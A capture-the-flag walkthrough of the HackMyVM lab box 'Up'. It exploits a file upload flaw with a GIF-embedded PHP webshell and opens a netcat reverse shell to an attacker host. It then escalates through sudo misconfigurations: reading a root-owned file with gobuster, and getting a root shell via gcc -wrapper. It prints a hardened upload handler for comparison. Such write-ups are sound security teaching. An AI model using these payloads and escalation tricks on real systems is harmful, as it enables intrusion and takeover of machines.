HackMyVM - Up: Detailed Walkthrough (WP)
By 城南花已开

Information Gathering

Service Enumeration

A new easy box just came out; I haven't played in a while, so this is a warm-up. Only port 80 is open.

❯ ip=192.168.56.111
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.111:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-10 20:59 CST
Initiating Ping Scan at 20:59
Scanning 192.168.56.111 [4 ports]
Completed Ping Scan at 20:59, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:59
Completed Parallel DNS resolution of 1 host. at 20:59, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:59
Scanning 192.168.56.111 [1 port]
Discovered open port 80/tcp on 192.168.56.111
Completed SYN Stealth Scan at 20:59, 0.04s elapsed (1 total ports)
Nmap scan report for 192.168.56.111
Host is up, received reset ttl 63 (0.00041s latency).
Scanned at 2024-12-10 20:59:25 CST for 0s

PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 5 (196B) | Rcvd: 2 (84B)

Most likely a file upload vulnerability. I tried uploading a webshell: just changing the file extension was enough for the upload to succeed, so there is basically no protection.

But where is the file stored? I instinctively tried /uploads, and the page responded with a hint.

Fine, I won't play along; run a directory scan and see what it turns up.

Inside the uploads subdirectory the scan finds a robots.txt and a clue.txt.

❯ gobuster dir -u $ip/uploads -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x .txt,.html,.php, -t 20 -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.111/uploads
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html,php,
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/robots.txt (Status: 200) [Size: 1301]
/clue.txt (Status: 200) [Size: 17]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

Visiting robots.txt returns a base64-encoded string; decoded, it looks like PHP source code.

<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $targetDir = "uploads/";
    $fileName = basename($_FILES["image"]["name"]);
    $fileType = pathinfo($fileName, PATHINFO_EXTENSION);
    $fileBaseName = pathinfo($fileName, PATHINFO_FILENAME);

    // Only the client-supplied extension is checked, never the file content
    $allowedTypes = ['jpg', 'jpeg', 'gif'];
    if (in_array(strtolower($fileType), $allowedTypes)) {
        // ROT13 the base name; the original extension is kept as-is
        $encryptedFileName = strtr($fileBaseName,
            'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz',
            'NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm');

        $newFileName = $encryptedFileName . "." . $fileType;
        $targetFilePath = $targetDir . $newFileName;

        if (move_uploaded_file($_FILES["image"]["tmp_name"], $targetFilePath)) {
            $message = "El archivo se ha subido correctamente.";
        } else {
            $message = "Hubo un error al subir el archivo.";
        }
    } else {
        $message = "Solo se permiten archivos JPG y GIF.";
    }
}
?>

From the source we learn that after upload the file is renamed to the encoded base name plus the original extension; a quick look shows the encoding is ROT13.

What I uploaded earlier was php-reverse-shell.jpg; the base name without .jpg, ROT13-encoded, becomes cuc-erirefr-furyy.

It can be requested without error, but the JPG is not parsed as PHP: it just shows up as a broken image.

Next I tried a GIF instead, prepending the one-liner webshell <?=$_GET[0]?>.

The GIF is parsed and the command executes, so pop a reverse shell:

eri.gif?0nc+-e+/bin/bash+192.168.56.102+4444
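For comparison, here is a hardened replacement for the upload handler recovered from robots.txt. This is an added example, not code from the box or its author; it closes the three weaknesses the walkthrough relied on (extension-only check, predictable ROT13 name, uploads stored where the server executes them) and assumes a hypothetical UPLOAD_DIR outside the document root with PHP execution disabled for it.

```php
<?php
// Added example, not the target's own code. Assumes UPLOAD_DIR is outside the
// web root and that the web server is configured not to execute anything in it.
declare(strict_types=1);

const UPLOAD_DIR = '/var/www/private_uploads/';   // assumed path, outside the web root
const MAX_BYTES  = 2 * 1024 * 1024;
// Map the MIME type sniffed from the file *content* to the only extension we will write.
const ALLOWED = ['image/jpeg' => 'jpg', 'image/gif' => 'gif'];

function storeUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed with code ' . (int) $file['error']);
    }
    if ($file['size'] > MAX_BYTES || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Rejected upload');
    }
    // Check the magic bytes instead of trusting the client-supplied name or type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('Only JPEG and GIF images are accepted');
    }
    // Re-encode through GD: metadata and trailing bytes are dropped, so a tag
    // appended to the image body (as in the walkthrough) does not survive intact.
    $img = $mime === 'image/gif' ? imagecreatefromgif($file['tmp_name'])
                                 : imagecreatefromjpeg($file['tmp_name']);
    if ($img === false) {
        throw new RuntimeException('Corrupt image');
    }
    // Random name: the stored path can no longer be derived from the upload name.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . $name;
    $ok = $mime === 'image/gif' ? imagegif($img, $dest) : imagejpeg($img, $dest, 85);
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('Could not write image');
    }
    return $name;   // record this name; serve the file through a read-only handler
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['image'])) {
    try {
        $message = 'Stored as ' . storeUpload($_FILES['image']);
    } catch (RuntimeException $e) {
        $message = $e->getMessage();
    }
}
```

Re-encoding is defence in depth, not a guarantee on its own; the no-execute upload directory is what actually stops a smuggled tag from running.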

Getting User

www-data@debian:/var/www/html/uploads$ sudo -l
Matching Defaults entries for www-data on debian:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty

User www-data may run the following commands on debian:
(ALL) NOPASSWD: /usr/bin/gobuster

With a shell, it turns out www-data has a sudo entry allowing gobuster. But how can this tool be used to read files or escalate privileges?

There was also that clue.txt from the earlier scan that I hadn't looked at yet; sure enough, it is a small hint.

❯ curl $ip/uploads/clue.txt
/root/rodgarpass

Most likely the intended path is to read this rodgarpass file through gobuster, by passing it as the wordlist.

However, pointing gobuster at the local host produces no results:

www-data@debian:/tmp$ sudo /usr/bin/gobuster dir -u 127.0.0.1 -w /root/rodgarpass
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /root/rodgarpass
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2024/12/10 16:08:30 Starting gobuster in directory enumeration mode
===============================================================

===============================================================
2024/12/10 16:08:30 Finished
===============================================================
www-data@debian:/tmp$

So instead, start a simple HTTP server on Kali and have the target scan Kali.

Checking the access log, one request path is the string b45cffe084dd3d20d928bee85e7b0f2.

┌──(kali㉿kali)-[~]
└─$ cat /var/log/nginx/access.log
192.168.56.111 - - [10/Dec/2024:09:11:39 -0500] "GET / HTTP/1.1" 403 125 "-" "gobuster/3.5"
192.168.56.111 - - [10/Dec/2024:09:11:39 -0500] "GET /d0c460a5-4e8a-4e26-a354-c4de0ee92dc7 HTTP/1.1" 404 125 "-" "gobuster/3.5"
192.168.56.111 - - [10/Dec/2024:09:11:39 -0500] "GET /b45cffe084dd3d20d928bee85e7b0f2 HTTP/1.1" 404 125 "-" "gobuster/3.5"

It looks like an MD5 hash, but this string is only 31 characters long, whereas a proper MD5 hex digest is 32.

┌──(kali㉿kali)-[~]
└─$ echo -n "b45cffe084dd3d20d928bee85e7b0f2" |wc -c
31

Whether the challenge author dropped a character on purpose or it is a bug, I don't know.

Even with one character missing, an online MD5 lookup still resolves it to the plaintext "string".

However, "string" itself is not rodgar's password.

Restoring the missing character, the password is the full 32-character MD5 digest:

┌──(kali㉿kali)-[~]
└─$ echo -n "string"|md5sum|awk '{print $1}'
b45cffe084dd3d20d928bee85e7b0f21

Switching to rodgar with this password gives the user flag.

www-data@debian:/home$ su rodgar
Password:
rodgar@debian:/home$ cd rodgar/
rodgar@debian:~$ ls
user.txt
rodgar@debian:~$ cat user.txt
b45cffe084dd3d20d928bee

Getting Root

The user also has a sudo entry:

rodgar@debian:/home$ sudo -l
Matching Defaults entries for rodgar on debian:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty

User rodgar may run the following commands on debian:
(ALL : ALL) NOPASSWD: /usr/bin/gcc, /usr/bin/make
rodgar@debian:/home$ sudo gcc -wrapper /bin/sh,-s .
# id
uid=0(root) gid=0(root) grupos=0(root)
# cd ~
# ls
rodgarpass rooo_-tt.txt
# cat rooo_-tt.txt
44b3f261e197124e60217d6ffe7e71a8e0175ae0